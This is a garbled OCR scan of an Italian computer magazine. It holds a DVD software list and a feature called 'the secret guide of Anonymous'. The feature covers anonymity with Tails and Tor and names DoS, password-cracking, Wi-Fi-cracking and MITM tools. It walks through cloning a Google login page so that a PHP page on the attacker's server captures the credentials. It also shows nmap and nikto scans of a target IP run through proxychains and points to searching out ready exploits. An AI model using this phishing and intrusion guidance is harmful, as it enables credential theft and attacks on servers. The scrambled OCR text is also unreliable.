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L'esclusivo kit 
software per superare 
qualsiasi protezione 



INCLUDE 

DVD da 8GB 


Win32Disk 
Imager 0.95 a 

Il tool per awiare sistemi 
operativi e distribuzioni da 
Pendrive USB 

file : Win32Disklmager-0.9.5-install.zip 

Windows XP 
Seivice Pack 4 unofficiai U 
Usi ancora Windows XP? 

Ecco il Service Pack 4 
Unofficiai 

file : WindowsXP-USP4-v3.1 a-x86-EN U.zip 
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Camera . ì 

Make up perfetto al tuo viso! 

file: Play Stare 

Kali Linux 20161 
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La distribuzione Linux per 
testare la sicurezza dei PC 

file: Online 
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Last Pass 4.1.2Q 
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protegge le tue password 
Web 
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Oltre 50 impostazioni per 
migliorare la privacy su 
Windows LO 
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PC Decrapifier 3.0 LI 

Programmi inutili addio! 
Ecco come rimuoverli 
al volo 

file: pc-decrapifier.zip 
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Processi sotto controllo 
con l'evoluzione del task 
manager 

file: ProcessExplorer.zip 
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Core Security 1.1.10 
Intercetta e ripulisce il PC da 
malware e spyware 

file: reason-core-security-setup.zip 

Should I 
remove it 104 

Questo programma va disin¬ 
stallato? Crea danni 
al sistema? 

file: ShouldlRemovelt_Setup.zip 
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Removai Tool LI 

Disinstallare Superfish di 
Lenovo dai computer infetti 
file: Lenovo.SuperFishRemovalTool.zip 
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file: SpyDetectFree.zip 
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Un elenco dettagliato delle 
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Controllo remoto del 
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RASPBIAN JESSIE O 

Trasforma il Raspberry in un PC desktop 

Gli sviluppatori di Raspbian hanno appena aggiornato la loro distribuzione Linux 
che permette di rendere il Raspberry Pi più simile ad un normale PC desktop con 
modifiche e miglioramenti all'interfaccia utente e alla gestione delle finestre. Sono 
stati aggiunti un'icona di espulsione in alto a destra per i dispositivi USB, la suite Li- 
breOffice, il dient Claws Mail, una serie di strumenti lava e una nuova finestra delle 
impostazioni. Questa Distro è già stata impostata al meglio, per evitare a tutti gli 
utenti di incontrare difficoltà davanti alla configurazione iniziale, 
file: 2016-03-1 8-raspbian-jessie.zip 


MAGIC LANTERNWIKI 

Nuove funzioni avanzate per le fotocamere dSLR di Canon 

Magic Lantern è una sorta di add-on firmware creato per le fotocame¬ 
re dSLR di Canon, che funziona assieme al firmware standard ed in grado 
sia di aggiungere numerose nuove funzionalità, che migliorare gli strumenti 
e le opzioni già integrate nella fotocamera. Include funzioni utili sia per im¬ 
magini ma soprattutto per i video, compresi il controllo manuale dell'au¬ 
dio, strumenti di aiuto per la messa a fuoco, esposizione, controlli ancora 
più precisi per liso, timelaps, astrofotografia e notturna e molto altro ancora, 
file: Magic Lantem.zip 
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Il software sul DVD-Rom (i) 


Cerberus Antifurto .lJ 

Rintraccia il dispositivo in 
caso di furti o smarrimenti 

file: Online 



Malwarebytes Anti- 
Ransomware 09.15 li 
Un vero mastino. Sorveglia 
il PC e blocca qualsiasi 
ransomware 

file: MBARW_Setup.zip 

Petya 

Extractor 

Disco criptato dai pericolosi 
ransomware? Sbloccalo così 
file: PetyaExtractor.zip 

Eset Tesla 
Decrypter 

Decodificare i file cifrati dal 
ransomware Tesla Crypt 

file: ESETTeslaCryptDecryptor.zip 

TeslaDecoder 

Rimuovere il ransomware 
TeslaCrypt 

file: TeslaDecoder.zip 

Kaspersky 
CoinVault 101 O 

Annienta il pericoloso ran¬ 


somware CoinVault 

file: CoinVaultDecryptor.zip 

Bitdefender 

Anti-Ransomware 

1.0.12.1 Q 

Protegge il PC dai più perico¬ 
losi ransomware 

file: BDAntiRansomwareSetup.zip 

Trend Micro 
AntiRansomware 
Tool 3 Li 

La sua soluzione efficace e 
sicura contro i ransomware 
file: AR20_build14_setup.zip 

TOR Browser 5.0.7 Q 
Naviga e scarica da Internet 
senza lasciare tracce 

file: torbrowser-install-5.0.7Jt.zip 

UNetbootin 6 13 O 

Installa Linux sulla tua 
chiavetta USB 

file: unetbootin-windows.zip 

Ophcrack 3.6.0 LI 

Recupero immediato delle 
password dimenticate 

file: ophcrack-installer.zip 



LophtCrack 
Password 6.0.20 O 
Verifica la robustezza delle 
password 

file: Ic6setup.zip 

Torshammer 10 

Attacchi anonimi e invisibili 
sotto DOS 

file: Torshammer.zip 

Hydra 

Testa la sicurezza delle pas¬ 
sword usate nelle reti Wifi 

file: thc-hydra-master.zip 

Aircrack-NG 12 

Il passepartout per le 
connessioni WiFi! 

file: Online 

Vega Web 
Vulnerability 
Scanner O 

Scova le vulnerabilità delle 
applicazioni Web 

file: vegaSetup.zip 

Nmap 20i a 

Potente tool di port scanning 
file: nmap-7.01-setup.zip 

Nikto 2 

Scova le vulnerabilità dei 
Web Server 

file: nikto-master.zip 

Ettercap 0.8.2 

Tieni sotto controllo la 


connessione Internet 

file: ettercap.zip 

La guida di Anonymous 
per stanare i 
terroristi Q 

file: The Noob Guide by Anonymous.zip 

Guida: gli strumenti 
per non farsi 
intercettare O 

file: ISIS-OPSEC-Guide.zip 

INDISPENSABILI 
Adobe Acrobat 
Reader DC LI 

Gestione completa dei PDF 
con supporto cloud 

Adobe Flash 
Player 23 LI 

Visualizza correttamente le 
pagine Web 

Adobe 
Shockwave 
Player 12.2.4 D 

Player multimediale per i 
contenuti Web 

CCleaner 5225724 LI 

Ripulisci a fondo il compu¬ 
ter da file inutili e obsoleti 

K-Lite Mega 
Codec Pack 1242 O 

Tutti i codec per riprodurre 
sul computer musica e 
video 


VLC Media Player 224 LI 

Il player multimediale nume¬ 
ro uno si aggiorna! 

TOR Browser 6.0.5 Q 
Naviga e scarica da Internet 
senza lasciare tracce 

uTorrent 349 a 

Sfrutta la rete Torrent per sca¬ 
ricare sempre al massimo 

7 -Zip 16.04 LI 
Creazione e gestione veloce 
di archivi compressi 

Daemon Tools 
Lite 10.4 LI 

Testa i tuoi CD e DVD e ma¬ 
sterizzali in sicurezza 

TV Dream 
Player 0.7.72 □ 

TV gratis e legale su PC, 
smartphone e tablet 

Freemake Video 
Converter 419 LI 

Conversione video 
multiformato 

Junkware 

Removai Tool 8.0.9 LI 

Piazza pulita delle toolbar 
indesiderate dal browser 

Notepad++ zo LI 

Editor di testo avanzato 
per il Web 



ASHAMPOO ANTISPY FOR WINDOWS IO LI 

Più privacy e sicurezza garantita per il tuo Windows 10 

Durante l'installazione di Windows molte impostazioni sono pre¬ 
configurate e, in molti casi, rimane poco chiaro in quale misu¬ 
ra Windows utilizzerà i nostri dati e le informazioni sull'utilizzo del 
computer. Ashampoo AntiSpy offre una serie di funzioni di sicu¬ 
rezza con le quale possiamo decidere di abilitare (e viceversa) l'uti¬ 
lizzo di queste funzioni. Due impostazioni preconfigurate, basate 
su raccomandazione dei laboratori di sicurezza Ashampoo, con¬ 
sentono di disattivare l'invio di qualsiasi segnalazione a Microsoft, 
file: Ashampoo_AntiSpy.zip 


KASPERSKY RANNOHDECRYPTOR 1.9.1 

Come decifrare i file cifrati dal trojan Rannoh 

Se il vostro PC finisce nella rete del ransomware CryptXXX con i dati irri¬ 
mediabilmente criptati dall'estensione ".CRYPT" e per sbloccarli vi chie¬ 
deranno un riscatto in bitcoin, niente pauta, visto che si può effettuare 
la pulizia ed il ripristino grazie al programma RannohDecryptor realiz¬ 
zato da Kaspersky. Si tratta di un potente decryptor gratuito in grado 
di decifrare i documenti criptati dai trojan Rannoh, CryptXXX e Cryakl. 
file: rannohdecryptor.zip 


Kaspersky RannohDecryptor 

Trojan-Ransom,Wn32.Rannoh decryptor tool a ll Report 


Ready to scan 

This utility is deagned to decrypt ftes encrypted by trotan proyams 
TroJavRansom.Wn32.Ramoh, 

UtÉty tnes to cattiate decrypton key automatic Jy. If it (s not possile 
You need to fnd ongnal copy of at least one of encrypted ftes. Other 
encrypted fies w4 be found and decrypted automatcally 

Please, save all opened documents before scan. 
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O Hacker in pratica 


Fai da te | La guida segreta di Anonymous 



uida segreta 
onymous 


A 

ATTENZIONE! 

Ricordiamo che violare i computer e le reti 
altrui è un reato perseguibile penalmente 
dalla legge italiana (art. 615 ter del Codice 
penale). Pertanto, alcune delle procedure 
descritte devono essere utilizzate esclu¬ 
sivamente a titolo illustrativo e posso¬ 
no essere messe in pratica solo sui 
nostri dispositivi o su quelli di 
amici informati di quanto 


Il kit software e il manuale ufficiale che 
dà la possibilità a chiunque di diventare 
un vero smanettone del Web 


stiamo facendo. 


S ono ormai anni che si sente parlare 
di Anonymous. Tuttavia c’è ancora 
molta confusione su cosa sia davvero 
questo fenomeno. Innanzitutto chiariamo 
che Anonymous non è un gruppo e nem¬ 
meno un team organizzato. Non esistono 
"capi” di Anonymous perché non esistono 
nemmeno membri: Anonymous è un modo 
di comportarsi, un modo di fare politica su 
Internet, quasi un’ideologia. Un po' come il 
movimento dei Black Bloc, che non sono un 
gruppo organizzato, ma si tratta piuttosto 
di un modo di fare protesta nelle strade. 
L'idea di base del movimento Anonymous 
è di sfruttare le azioni di pirateria per pu¬ 
nire le persone (ma anche enti governativi 
e multinazionali) che sono generalmente 
ritenute colpevoli di qualcosa, ma che non 
hanno ricevuto una condanna da parte 
del sistema giudiziario. Tipicamente, gli 
attivisti che sentono di appartenere al mo¬ 
vimento ideologico Anonymous prendono 
di mira pedofili, criminali internazionali 
e industriali corrotti. 


Supereroi digitali? 

Insomma, una versione digi¬ 
tale di Daredevil, il supereroe 
Marvel che punisce i criminali 
che non possono essere toccati 
dalla giustizia per mancanza di 
prove. Grazie agli strumenti del¬ 
la pirateria informatica, diventa 
possibile entrare nei computer dei 
criminali, trovare le prove della 
loro colpevolezza e svelarle pubbli- I, 
camente assieme all'identità dei col¬ 
pevoli sui social network affinché la 
giustizia possa fare il suo corso. Ma chi 
sono i pirati Anonymous? Non si sa, ma 
certamente si tratta di persone di estra¬ 
zione molto diversa: in base allo stile 
di scrittura di alcuni co- 
municati, è evidente 
che molti di que- J 
sti pirati hanno 
una formazio¬ 
ne importante 
non solo sul lato informati- 



L'ANONIMATO NON È UNA MERCE 
CHE SI PUÒ COMPRARE 

Innanzitutto attenzione: leazio- mato, che può essere ottenuto ilTor può effettivamente fornirci 
ni svolte dagli attivisti di Ano- grazie a Tore ai sistemi operativi un indirizzo IP falso, in modo da 
nymous sono illegali in Italia e GNU/Linux. È fondamentale pe- renderci non rintracciabili dagli 
in molti altri paesi. Entrare nel rò ricordare un concetto troppo operatori telefonici.Tuttavia, an- 
computerdi un'altra persona, an- spesso ignorato: l'anonimato che conTor, l'anonimato dipende 
chepermotivazioni"nobili",èun non è una merce che si possa soprattutto dal nostro comporta- 
reato. Quindi, se davvero si vuole comprare "pronta all'uso". Non mento:se paghiamo con la nostra 
diventare un pirata informatico, esiste un programma o un meto- carta di credito oppure se acce- 
la prima cosa da fare è assicurarsi do standard per essere anonimi, diamo al nostro profilo Facebook, 
di nonessererintracciabili.il be- L'anonimato è uno status quo siamo comunque identificabili, a 
ne più importante per un pirata che si ottiene comportandosi in prescindere dall'utilizzo della rete 
informatico è dunque l'anoni- modo intelligente. Per esempio: di navigazione anonima. 


co, ma anche su quello giuridico. Tanto che 
più di qualcuno ha avanzato l'ipotesi che 
alcuni pirati Anonymous siano avvocati 
o magistrati stanchi di vedere prosciolti 
per insufficienza di prove persone che so¬ 
no palesemente colpevoli, solo perché la 
giustizia democratica ha ovviamente dei 
limiti. Infatti, realizzare intercettazioni e 
sequestri di denaro e informazioni è spesso 
talmente complicato, dal punto di vista 
burocratico, che i criminali riescono ad 
accorgersene in tempo e far sparire il ma¬ 
teriale incriminante. 

Precisi obiettivi 

Oltre ai tradizionali soggetti "attenzionati” 
dagli attivisti Anonymous, come i criminali 
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Impariamo a navigare anonimi 

Lo strumento principale degli attivisti di Anonymous è la distribuzione Linux Tails: può essere usata da pendrive 
e contiene il necessario per diventare invisibili sul Web. Nelle pagine seguenti vedremo come utilizzarla al meglio. 



^ L’OS sulla pendrive 

Scarichiamo la ISO di Tails dalla sezione Spe¬ 
ciali del Win DVD-Rom. Scaricata l’immagi¬ 
ne, scriviamo su una pendrive da almeno 4 GB con 
Il programma Unetbootin (sezione Speciali del Win 
DVD-Rom). Quindi riavviamo il computer dall’unità 
USB impostando il boot dal BIOS. 



^ Il motore di ricerca 

4 Fare tanta attenzione a mantenere l'anoni¬ 
mato e poi rivolgersi a Google come motore 
di ricerca potrebbe non essere la scelta più intelligen¬ 
te. Per questo motivo con Tails utilizziamo sempre il 
motore di ricerca predefinito startpage.com, che non 
memorizza informazioni e non filtra i risultati. 



^ Il browser più adatto 

Al primo avvio di Tails viene avviato automa¬ 
ticamente il programma Tor. Naturalmente, 
per navigare sul Web è necessario un browser che 
possa entrare nella rete Tor, come IceWeasel, una 
versione particolare di Firefox avviabile dal menu 
Applications/lnternet/lceweasel Web Browser. 



± Una ricerca nel Deep Web 

Grazie a Start Page otteniamo i risultati che 
normalmente ci fornisce Google, ma con tut¬ 
to l'anonimato che vogliamo e senza i filtri che poli¬ 
zia postale e provider pongono normalmente. E se 
vogliamo esplorare il Dark Web, usiamo il tool Tor- 
Search (www.winmagazine.it/link/3335). 



^ Connessioni con rHTTPS 

IceWeasel contiene già tutti i plug-in neces¬ 
sari a garantire la massima sicurezza possi¬ 
bile, come HTTPS Everywhere, che tenta di stabilire 
sempre connessioni cifrate. Ma non preoccupiamoci 
troppo delia crittografia, a meno che non temiamo di 
essere già intercettati da qualcuno. 



^ Un browser “non sicuro” 

0 Possiamo anche usare un browser non ano¬ 
nimo: dal menu Applications/lnternet sce¬ 
gliamo Unsafe Web Browser, appariremo in Rete 
col nostro vero indirizzo IP. Questo è utile per avere 
una “doppia vita”, apparendo contemporaneamente 
col nostro indirizzo IP vero e quello falso! 


internazionali, si è aggiunta di recente una 
nuova categoria: quella dei terroristi. In par¬ 
ticolare, gli estremisti dell’ISIS. In seguito 
agli attentati di Parigi, alcuni pirati Anony¬ 
mous hanno voluto lanciare la cosiddetta 
Operazione Paris, che sui social network 
viene identificata dall’hashtag #OpParis. 
Obiettivo di questa operazione è colpire i 
militanti ISIS con la tecnologia, oscurando 
i loro comunicati (in particolare bloccando 
i filmati delle decapitazioni che servono 
allo stato islamico come "pubblicità" per 
il reclutamento di nuovi soldati), rivelando 
l’identità dei militanti stessi e, per quanto 


possibile, la loro posizione geografica. Inol¬ 
tre si cerca anche di identificare il denaro 
(ingente) nella disponibilità dei militanti 
ISIS, per sottrarlo e dunque prosciugare i 
fondi tramite i quali l'organizzazione ter¬ 
roristica si procura viveri, armi, munizioni 
e mezzi di trasporto. 

Campagna acquisti 

Per fare tutto questo servono persone, 
nuovi attivisti disposti a contribuire al¬ 
la battaglia informatica. Come abbiamo 
detto, Anonymous non è un gruppo e non 
esistono capi e procedure di affiliazione. 


Chiunque lo voglia, può essere Anony¬ 
mous. O quasi. Perché per comportarsi 
come un vero Anonymous servono nozioni 
di pirateria informatica non da poco. Ed 
è per questo motivo che recentemente è 
stato rilasciato un vero e proprio "manua¬ 
le pratico dell’apprendista Anonymous" 
(www.winmagazine.it/link/3334) rivolto a 
chiunque voglia partecipare alle campagne 
dell'ideologia di Anonymous. Analizziamo 
quindi gli strumenti "suggeriti" in questo 
vademecum e scopriamo come utilizzarli 
al meglio per diventare veri smanettoni 
del Web! 
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I SOFTWARE CONSIGLIATI DALLA GUIDA UFFICIALE DI ANONYMOUS 

II manuale dell'aspirante attivista contiene una lista di applicazioni per le varie attività di pirateria informatica. Eccole in dettaglio. 

ATTIVITÀ I TOOLKIT 


ATTACCHI DENIAL 
OF SERVICE (DOS) 

BRUTE 
FORCE DELLE 
PASSWORD 

ATTACCHI MAIN 
IN THE MIDDLE 


SCANSIONE 
DEI SERVER 


Tor's Hammer: è un tool per testare il corretto funzionamento del servizio Tor. Sito Internet: www.winmagazine.it/Iink/3336 

Slowloris: avvia lente connessioni col server per riempire le tabelle facendo così respingere le nuove. Sito Internet: www.winmagazine.it/link/3337 

OphCrack: è un'applicazione open source per il recupero di password e numeri seriali. Sito Internet: www.winmagazine.it/link/3338 

Hydra: un potente tool per il crack dei sistemi di accesso alle reti. Sito Internet: www.winmagazine.it/link/3339 

Aircrack-NG: permette di individuare velocemente le chiavi di accesso alle reti Wi-Fi. Sito Internet: www.winmagazine.it/link/3340 

Ettercap: permette di intercettare tutto il traffico di rete da e verso il server preso di mira. Sito Internet: www.winmagazine.it/link/3341 

Nmap: tool per la network exploration e l'auditing che permette di scansionare rapidamente reti di grandi dimensioni e piccoli host. 

Sito Internet: www.winmagazine.it/link/3342 

Nikto: analizza le vulnerabilità di un Web server sfruttando un database di file e configurazioni note. Sito Internet: www.winmagazine.it/link/3343 
Vega: scanner di rete nato per testare la sicurezza delle applicazioni Web alla ricerca di vulnerabilità. Sito Internet: www.winmagazine.it/link/3344 


Sito Web senza censure... 


Ecco come attivare un server sul nostro computer per pubblicare materiale on-line e come configurare 
correttamente il router per renderlo accessibile anche dall’esterno e condividere qualsiasi cosa. 



-w II nostro nome in Rete 

'li Innanzitutto registriamo un nome di dominio 
gratuito sul sito www.noip.com: durante la 
procedura di iscrizione (Sign up) indichiamo un’e- 
mail, il nostro nome utente e la password. Sceglia¬ 
mo subito anche un nome di dominio gratuito di terzo 
livello, ad esempio gianni.systes.net 


± Un server in un clic 

Scarichiamo l’archivio GhostWebsite.zip dal 
sito www.winmagazine.it/link/3345 ed estra¬ 
iamolo (sull’hard disk o su pendrive): per avviare il 
programma basta eseguire il file ghostwebsite.exe. 
La prima operazione da compiere, quindi, è avvia¬ 
re il server Web cliccando sul pulsante Avvia il sito. 


± Già pronto all’uso 

Lasciando spuntata la voce Apri il mio 
browser preferito verrà automaticamente 
aperto il browser alla home page del sito Web loca¬ 
le (localhost:81/wordpress). Se è la prima volta che 
eseguiamo il server, il firewall potrebbe chiedere l’au¬ 
torizzazione (che ovviamente dobbiamo concedere). 



^ Salve, mi chiamo Gianni 

^ Per essere raggiungibili da altri PC, associa¬ 
mo il nostro server al nome di dominio creato 
su noip.com. Clicchiamo Configura il nome del tuo 
sito e nella finestra che chiede le nostre credenziali 
di accesso a noip.com premiamo Edithosts per sce¬ 
gliere quale dei nomi di dominio usare. 


^ Dentro Wordpress 

0 Configurato il nome di dominio del sito, sia¬ 
mo pronti per lavorare su Wordpress. Andia¬ 
mo nel browser aperto sul nostro sito e clicchiamo 
Accedi in basso a sinistra nella pagina. Le creden¬ 
ziali di accesso predefinite sono administrator come 
nome utente e ideawebl come password. 


^ Correggiamo l'indirizzo 

Affinché il nome di dominio funzioni è fonda- 
mentale comunicarlo a Wordpress. Dal pan¬ 
nello di amministrazione andiamo in Impostazioni/ 
Generali e modifichiamo il nome localhost con il 
nome di dominio (ad esempio gianni.sytes.net) in 
entrambe le caselle che riportano l'indirizzo del sito. 
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... grazie al server anonimo 

Ora che il nostro sito Web è raggiungibile on-line, possiamo configurarlo per usare un server Tor in modo 
da condividere qualunque tipo di contenuto senza rivelare la nostra vera identità. Vediamo come procedere. 




B 

Cambiamo la oassword! 


Un sito con... la cinolla! 

m 

B 

nostro nome segreto 

1 

Indipendentemente dal fatto di rendere il sito 
pubblico o privato, ricordiamoci di cambiare 


Per inserire il nostro server nella rete Tor, con¬ 
nettiamoci alla rete Onion: da GhostWebsi- 


Verranno creati il nome di dominio segre¬ 
to e la chiave con cui cifrare la connessione. 


la password: mantenendo quella originale qualcuno 
potrebbe scoprirla e accedere come amministratore. 
Per farlo, dal pannello di amministrazione del sito cuc¬ 
chiamo Utenti/ll tuo profilo. 


te clicchiamo Avvia la rete Tor. Dopo qualche minu¬ 
to verrà caricato il tool TorBrowser: è importante non 
chiuderlo, infatti rimarremo connessi alla rete Tor solo 
finché questo browser è in esecuzione. 


Per conoscere il nome, in GhostWebsite clicchiamo 
Aggiorna: prendiamo nota del nome che appare di 
fianco al pulsante. D'ora in poi il sito sarà sempre rag¬ 
giungibile su rete Tor tramite questo indirizzo. 


Come fatto per il nome di dominio pubbli¬ 
co ottenuto da noip.com, anche per il nome 
che ci fornisce Tor dobbiamo correggere l’indirizzo 
in Wordpress (tramite il browser che lavora su local- 
host:81) da Impostazioni/Generali. L'indirizzo sarà 
qualcosa del tipo http://dj09w3b7e4b83.onion:81 . 


0 Dal momento in cui impostiamo su Wordpress 
il nome di dominio Tor come indirizzo, il sito 
sarà visibile solo da TorBrowser (inserendo l'indirizzo 
in questione). Possiamo fare tutto quello che vogliamo: 
ad esempio dal menu Articoli/Aggiungi nuovo possia¬ 
mo realizzare un nuovo articolo. 


Quando dobbiamo fare manutenzione al sito o 
renderlo inaccessibile dall’esterno, continuan¬ 
do comunque ad accedervi da locale (cioè solo dal¬ 
lo stesso computer su cui il server è in esecuzione), 
basta riportare l'indirizzo del sito a http://localhost:81 / 
wordpress dal pannello di amministrazione. 




L'IMPORTANZA DI AVERE UN SITO WEB NELLA RETE TOR 


Nelle pagine precedenti abbiamo proposto l'uso di 
Tor come Client per accedere in modo anonimo al 
Web, ma è possibile usare la famosa rete "a cipolla" 
anche come server. Il bellodi avere un serverWeb che 
funziona sulla reteTor, cioè un cosiddetto sito Web 
Onion, è che non siamo identificabili: gli utenti del 
sito non possono risalire al nostro indirizzo IP realee 
quindi non ci possono identificare. Allo stesso modo, 
nessuno (noi compresi) può identificare gli utenti del 
sito: tutti sono assolutamente anonimi. Questo può 
essere particolarmente importante per chi si trova in 
paesi che limitano la libertà di stampa: un cittadino 
ucraino poteva (durante la rivoluzione) pubblicare 


un sito Tor con notizie sui crimini del governo, senza 
il rischio di essere scoperto e arrestato. È importante 
ricordare che il server funziona su reteTor anche se 
non abbiamo abilitato il port forwarding del router, 
perché la connessione viene gestita direttamente 
dalla rete Onion. Anzi, è molto meglio non aprire la 
porta 81 sul router (leggi il Macropasso Sito Web 
senza censure. ..). Così l'unico modo per accedere 
al server sarà tramite la reteTor: un utente (e questo 
vale anche per i programmi di scansione automatica 
come Echelon o Prism) che si trova su Internet (e che 
quindi può leggere il nostro vero indirizzo IP) non 
sarebbe in grado di entrare nel sito. 


Win Magazine 11 






























Fai da te | La guida segreta di Anonymous | 


O Hacker in pratica 


Così ti rubo le password 

A volte il metodo più semplice per rubare dati riservati a una vittima è chiederglieli! Usando tecniche di phishing 
un pirata può facilmente ingannare un utente e farsi comunicare tutte le sue chiavi di accesso. 



fi 

| Una pagina da clonare 


| Ecco il codice sorgente 

1 

1 Per cominciare, il pirata apre nel browser la 
' pagina di login del sito che vuole clonare, ad 


1 Se usa Chrome, gli basta modificare l'indirizzo 
' nell’apposita barra inserendo il prefisso view- 


esempio il login di Google. Dovrà costruire una pagi- source:. Ora, deve selezionare tutto il testo e copiarlo 
na simile, quindi ha bisogno del codice sorgente: può negli appunti di sistema, con le solite combinazioni di 
ottenerlo cliccando sulla pagina col tasto destro del tasti Ctrl+A e Ctrl+C, oppure procedendo con la sele- 
mouse e scegliendo Visualizza sorgente pagina. zione manuale tramite mouse. 



B Qualche piccola modifica 

Il malintenzionato apre il Blocco Note di 
Windows e incolla il testo precedentemente 
copiato negli appunti. Cerca quindi il form HTML per 
l’inserimento di nome utente e password e modifica la 
sua action di modo che punti a una pagina in grado di 
memorizzare questi dati sul server del pirata. 





I 


Serve una pagina ad hoc 

I II pirata deve poi scrivere il codice della pagi- 

_' na PHP che si occuperà di memorizzare i dati. 

Questa pagina non fa altro che leggere le variabili otte¬ 
nute con HTTP POST e registrarle in un file. Quindi 
dovrà anche reindirizzare l'utente alla vera pagina di 
login di Google per non destare sospetti. 


Tutto su un server 


A questo punto il pirata prende i due file (la 
pagina HTML modificata e quella PHP) e li 
carica su un proprio server. Meglio ancora sarebbe 
caricare almeno la pagina HTML su Google Drive, così 
che gli utenti siano “imbrogliati” anche dai fatto che il 
dominio principale del sito sia google.com. 


! Simile, ma non uguale 


Visitando la pagina di login falsa creata dal 
_' pirata, potremmo notare che assomiglia mol¬ 
to a quella del vero Google. Due particolari, però, ci 
mettono in guardia: l’indirizzo non è quello standard di 
Google e il protocollo di accesso al server non è HTTPS 
(usato invece sempre da Big G). 


LA TABELLA MAGICA PER SCOPRIRE LE PASSWORD ALTRUI! 


Nei film si vede sempre che il pirata di 
turno impiega 60 secondi per entra¬ 
re in un server protetto da password. 
Nella realtà non è così: di solito ser¬ 
ve molto meno tempo! Se nessuno 
ha cambiato la password di default si 
entra con "root", "admin", "1234" ecc. 
Se, invece, il server è gestito da una 
persona competente e responsabi¬ 
le, è probabile che le cose si faccia¬ 
no più complesse per il pirata. E allo¬ 
ra non bastano nemmeno 60 minuti. 
L'unica soluzione sta neL'brute force": 
cioè provare tutte le combinazioni 


possibili fino a trovare la password 
giusta. Questo tipo di attacco si può 
applicare a qualsiasi sistema o servi¬ 
zio: ad esempio per scoprire la pas¬ 
sword di un server POP3 o FTP, o 
anche la password di accesso di un 
router. È invece molto difficile per un 
server SSH, che impedisce tentativi 
frequenti di accesso con password 
errata. Ad ogni modo il pirata ha 
cura di scrivere i comandi sul termi¬ 
nale facendoli precedere dal coman¬ 
do proxychain in modo da eseguire 
le operazioni passando attraverso la 


reteTor per non essere identificato. Il 
programma più comodo per il bru¬ 
te force è OphCrack (sezione Speciali 
del Win DVD-Rom), perché dispone 


delle rainbowtables: si tratta di tabel¬ 
le che velocizzano la costruzione di 
password casuali per indovinare nel 
minore tempo possibile quella giusta. 
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Ecco le vulnerabilità del Web 

Su Internet è facile trovare strumenti software gratuiti che consentono a un attivista di Anonymous di individuare 
le vulnerabilità di un server e, attraverso queste, assumerne il controllo totale. 



IBI o luca : bash - Konsole 

File Modifica Visualizza Segnalibri Impostazioni Aiuto 


luca@TRINGALINVENT:~$ sudo apt-get instali nma| 


.x Motore di ricerca ad hoc 

Innanzitutto il pirata deve conoscere l’indirizzo IP del server che vuole 
prendere di mira: può esserselo procurato in diversi modi, ma se non 
ha un obiettivo specifico probabilmente ha utilizzato il motore di ricerca Shodan, 
raggiungibile all'indirizzo https://www.shodan.io. 


* 

HI* Modifica 

lui* bufi - Konsole 

visuili::a j*gn«libr. impostazioni Aiuto 

v * 


VEH7.-S sudo rmstt *0 -v -vl-SIM *T4 -sS UT 1 


Starimi Smp 

fa 40 ( ftttp /fnaap or» j at J8U-B1-8S 11 !>/ CLI 


Ini t 1 atinf SVN 

ite» itn ica n at il u / 


iciwiri ■ - - - 



D'scovc ree ope 

n po?t 3396/reo or 



n tiner 44S/trp an 



n par ! or 


Di scovered eoe 

n po^t faJl/tCP <yn _ 






^ Prima si installa Nmao 

Una prima scansione, utile per farsi un’idea del server che si sta cer¬ 
cando di forzare, può essere fatta con Nmap. In Tails, tale programma 
non è preinstallato, quindi è necessario installarlo con il gestore dei pacchetti di 
sistema, li comando da lanciare è sudo apt-get instali nmap. 



^ L’analisi del sistema 

È possibile effettuare una scansione approfondita con Nmap, dopo averlo 
installato, con il comando: sudo nmap -0 -v -pi-5000 -T4 -sS INDI- 
RIZZOIP. Il risultato è un elenco delle porte aperte sul server ed eventualmente 
anche un riconoscimento del sistema operativo e della versione. 


^ Una scansione approfondita 

4 Il pirata può sfruttare queste informazioni per cercare velocemente su 
Internet delle vulnerabilità tipiche di quel sistema operativo. Una scan¬ 
sione ancora più approfondita può essere svolta con il programma Nikto 2, che 
può essere scaricato dal sito https://cirt.net/Nikto2. 


■ o- 

File Modifica Visualizza 

nikto-2.1.5 : bash - Konsole 

Segnalibri Impostazioni Aiuto 


^ O 1 

-ssl 

Force ssl mode on port 



-Tuning+ 

Scan tuning 



- timeout+ 

Timeout for requests (default 10 

seconds) 


-update 

Update databases and plugins from 

CIRT.net 


-Version 

Print plugin and database versions 


-vhost+ 

Virtual host (for Host header) 



+ requires a value 



Note: This is thè 

short help output. Use -H for full 

help text. 


uca@TRINGALINVENT:~/nikto/nikto-2.1.5$ peri nikto.pl -host 



Nikto V2.1.5 







^ Basta un solo comando 

Dopo aver estratto il contenuto dell’archivio compresso in una qualsiasi 
cartella, il pirata avvia il Terminale, indica come percorso quello della 
cartella stessa e dà il comando peri nikto.pl -host INDIRIZZOIP. Il risultato sarà 
un elenco delle varie vulnerabilità identificate sul server. 


^ Alla ricerca dell’exploit 

A questo punto il pirata deve soltanto leggere l'elenco delle vulnerabilità, 
sceglierne una e cercare il suo nome (o il numero identificativo OSVDB) 
su un qualsiasi motore di ricerca (magari non Google) per trovare un nutrito 
numero di informazioni e magari qualche exploit pronto all'uso. 
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O Hacker in pratica 


Anche la Chat è segreta 

Tra gli strumenti integrati nella distribuzione Tails c’è quello che permette di crittografare le sessioni di Chat, 
per rendere difficile la vita ad eventuali spioni. Potremo così comunicare in maniera completamente anonima. 




B | Il piccione viaggiatore 

Il programma di messaggistica istantanea 
' integrato in Tails si chiama Pidgin ed è rag¬ 
giungibile dal menu Applications/Internet/Pidgin 
Internet Messenger. Pidgin supporta la maggior par¬ 
te dei servizi di messaggistica, ma in Tails molti sono 
disabilitati perché non sicuri. 


Dov’è la sicurezza? 


e 

H'JI I server a cui ci si può collegare, per chattare 
^ in sicurezza, sono di tipo IRC. In particolare, 
Pidgin è predisposto per connettersi automaticamen¬ 
te al server irc.oftc.net. nella schermata di benvenuto 
è sufficiente mettere la spunta alla apposita casella di 
controllo Enabled. 


0 Qualche impostazione 

Dobbiamo ora creare delle nuove chiavi crit¬ 
tografiche PGP per poter scrivere e leggere 
messaggi in assoluta sicurezza. Quindi, nella finestra 
principale di Pidgin, apriamo il menu Tools e sceglia¬ 
mo la voce Plugins. La cifratura della connessione, 
infatti, avviene grazie a un plug-in. 



Bloccare le intercettazioni 


Nel lungo elenco che appare sullo schermo, 
dobbiamo trovare la voce Off-The-Record. 
Questo plug-in si occupa di cifrare tutta la comunica¬ 
zione, quindi anche se qualcuno ci sta intercettando, 
non potrà leggere i nostri messaggi. Clicchiamo quindi 
sul pulsante Configure Plugin. 


Ecco le chiavi di codifica 


Visto che si usa il protocollo crittografico PGP, 
anche in questo caso sarà necessario creare 
una coppia di chiavi di codifica. Il pulsante Generate 
